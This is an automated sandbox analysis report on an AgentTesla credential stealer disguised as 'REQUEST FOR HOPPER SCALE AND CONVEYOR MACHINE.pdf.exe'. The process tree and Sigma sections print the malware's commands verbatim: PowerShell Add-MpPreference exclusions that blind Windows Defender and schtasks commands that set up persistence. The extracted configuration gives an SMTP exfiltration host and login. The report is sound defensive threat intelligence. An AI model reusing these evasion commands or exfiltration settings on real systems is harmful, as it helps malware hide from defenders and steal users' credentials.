Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe

Overview

General Information

Sample name:REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
Analysis ID:1569777
MD5:2293ce96ec6bf9e7d7214091d74e4c35
SHA1:316245e8d58e8a6c8fec19010eeabf43171f608b
SHA256:e963a79ed303a65d9ff3b15753909309d4156d38cff9e403e39ab1a72e0113e5
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe" MD5: 2293CE96EC6BF9E7D7214091D74E4C35)
    • powershell.exe (PID: 7736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vmPeKTe.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8184 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7892 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • vmPeKTe.exe (PID: 8140 cmdline: C:\Users\user\AppData\Roaming\vmPeKTe.exe MD5: 2293CE96EC6BF9E7D7214091D74E4C35)
    • schtasks.exe (PID: 5216 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 1608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.ru", "Username": "negozio@depadova.cf", "Password": "graceofgod@amen"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1483006470.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000002.1483006470.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000A.00000002.1483006470.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x31869:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x318db:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x31965:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x319f7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x31a61:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x31ad3:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x31b69:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31bf9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                10.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  10.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 12 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Double Extension File Execution
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", CommandLine: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, NewProcessName: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, OriginalFileName: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ProcessId: 7552, ProcessName: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ParentImage: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ParentProcessId: 7552, ParentProcessName: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ProcessId: 7736, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ParentImage: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ParentProcessId: 7552, ParentProcessName: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ProcessId: 7736, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vmPeKTe.exe, ParentImage: C:\Users\user\AppData\Roaming\vmPeKTe.exe, ParentProcessId: 8140, ParentProcessName: vmPeKTe.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp", ProcessId: 5216, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 8048, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49711
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ParentImage: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ParentProcessId: 7552, ParentProcessName: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp", ProcessId: 7892, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ParentImage: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ParentProcessId: 7552, ParentProcessName: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ProcessId: 7736, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe", ParentImage: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ParentProcessId: 7552, ParentProcessName: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp", ProcessId: 7892, ProcessName: schtasks.exe

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.ru", "Username": "negozio@depadova.cf", "Password": "graceofgod@amen"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeReversingLabs: Detection: 57%
                    Multi AV Scanner detection for submitted file
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeReversingLabs: Detection: 57%
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeVirustotal: Detection: 65%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeJoe Sandbox ML: detected
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49713 version: TLS 1.2
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.8:49711 -> 77.88.21.158:587
                    Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.8:49711 -> 77.88.21.158:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: smtp.yandex.ru
                    Source: RegSvcs.exe, 0000000F.00000002.3883053125.0000000005FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl
                    Source: RegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.glR
                    Source: RegSvcs.exe, 0000000F.00000002.3892607664.00000000094AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign
                    Source: RegSvcs.exe, 0000000F.00000002.3882253046.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.000000000301F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.000000000950D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002F7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882308121.0000000005EFA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3872420125.0000000000EFC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.00000000094FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3893617440.0000000009558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsrsaovsslca2018.crl0j
                    Source: RegSvcs.exe, 0000000F.00000002.3874134304.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.000000000301F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.000000000950D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3873154198.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882826861.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3872420125.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.0000000009531000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892760446.00000000094C5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002F7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882308121.0000000005EFA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892335862.0000000009474000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.00000000094FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: RegSvcs.exe, 0000000F.00000002.3883053125.0000000005FA5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882253046.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892240809.0000000009468000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.000000000301F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.000000000950D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892760446.00000000094C5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002F7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882308121.0000000005EFA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892760446.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3893617440.0000000009558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
                    Source: RegSvcs.exe, 0000000F.00000002.3882253046.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892607664.00000000094AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.000000000301F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.000000000950D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002F7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882308121.0000000005EFA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3872420125.0000000000EFC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.00000000094FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3893617440.0000000009558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsrsaovsslca20180V
